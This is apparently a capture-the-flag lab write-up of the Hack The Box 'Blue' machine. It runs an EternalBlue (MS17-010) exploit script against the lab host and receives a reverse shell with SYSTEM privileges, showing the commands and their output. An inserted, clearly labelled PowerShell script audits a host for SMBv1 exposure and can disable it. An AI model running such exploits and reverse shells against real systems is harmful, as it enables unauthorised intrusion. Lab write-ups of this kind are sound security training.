EternalBlue


I initially thought that something was wrong with the machine because it only had a misconfigured SMB server up and running. It also appeared that no user had ever signed in to the system, based on the enumeration made. Then I looked at the name of the machine and decided to check for vulnerabilities on the SMB server itself. That's when I realized that the target SMB server is vulnerable to [[blue_cve-2017-0143#cve-2017-0143 / MS17-010|EternalBlue]].

┌──(kali㉿kali)-[~/…/htb/labs/blue/MS17-010]
└─$ python2 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 
shellcode size: 2203
numgroomconn: 13
target os: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Launching the exploit with the payload
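The condition the exploit above relies on is an unpatched Windows 7 host with the SMBv1 server still enabled and reachable. The following script is an added example, not part of the original writeup or the exploit kit, showing how a defender would audit a Windows 7 SP1 / Server 2008 R2 host for that exposure and, optionally, switch SMBv1 off. It assumes it is run in an elevated PowerShell session on the host itself; the KB numbers are the March 2017 updates for Windows 7 SP1 listed in the MS17-010 bulletin (KB4012212 security-only, KB4012215 monthly rollup), and the registry value used to disable SMBv1 is Microsoft's documented method for that OS generation.

```powershell
# Added example (not from the writeup): audit a Windows 7 SP1 / 2008 R2 host for
# the conditions that make it exploitable by MS17-010 and optionally remediate.
# Assumptions: elevated session on the host being checked; KB numbers are the
# March 2017 Windows 7 SP1 updates referenced by the MS17-010 bulletin.

param(
    [switch]$Remediate   # pass -Remediate to disable the SMBv1 server (reboot required)
)

$smbParams  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$ms17010Kbs = @('KB4012212', 'KB4012215')   # security-only and monthly rollup for Win7 SP1

# 1. Is the SMBv1 server enabled? On Windows 7 a missing SMB1 value means "enabled".
$smb1Value   = (Get-ItemProperty -Path $smbParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
$smb1Enabled = ($null -eq $smb1Value) -or ($smb1Value -ne 0)

# 2. Is one of the MS17-010 updates present?
#    Caveat: later monthly rollups supersede KB4012215, so on a host that kept
#    patching after March 2017 this can report "not patched" even though the fix
#    is included. Treat a negative here as "verify further", not as proof.
$installed = Get-HotFix -ErrorAction SilentlyContinue |
             Where-Object { $ms17010Kbs -contains $_.HotFixID }
$patched   = ($installed | Measure-Object).Count -gt 0

# 3. Is TCP 445 actually listening? An enabled-but-unreachable SMB server is a
#    smaller problem than the exposed one found on this box.
$listening = [bool](netstat -ano | Select-String ':445\s+.*LISTENING')

# Summary object; New-Object keeps this working on the PowerShell 2.0 that ships with Win7.
New-Object PSObject -Property @{
    Host           = $env:COMPUTERNAME
    SMB1Enabled    = $smb1Enabled
    MS17010Patched = $patched
    Port445Listen  = $listening
    AtRisk         = ($smb1Enabled -and (-not $patched) -and $listening)
} | Format-List Host, SMB1Enabled, MS17010Patched, Port445Listen, AtRisk

if ($Remediate -and $smb1Enabled) {
    # Microsoft's documented method for Windows 7 / 2008 R2: SMB1 = 0 under
    # LanmanServer\Parameters, then reboot for the server service to pick it up.
    Set-ItemProperty -Path $smbParams -Name SMB1 -Type DWORD -Value 0 -Force
    Write-Host 'SMBv1 server disabled in the registry; reboot required for it to take effect.'
}
```

Run it without arguments first to see the three indicators side by side; `AtRisk` is only true when all three line up, which is exactly the state the writeup found. Disabling SMBv1 removes the vulnerable code path regardless of patch level, so `-Remediate` is the durable fix where nothing still depends on the old dialect.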

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/blue]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
haris-PC
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::647e:9dcb:b0b5:d3e6
   Temporary IPv6 Address. . . . . . : dead:beef::60bf:2d1e:9506:67bc
   Link-local IPv6 Address . . . . . : fe80::647e:9dcb:b0b5:d3e6%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%11
                                       10.10.10.2
 
Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Although the x86 payload was never executed, I got a connection back on port 1234, which was hooked up to the x64 payload.

System Level Compromise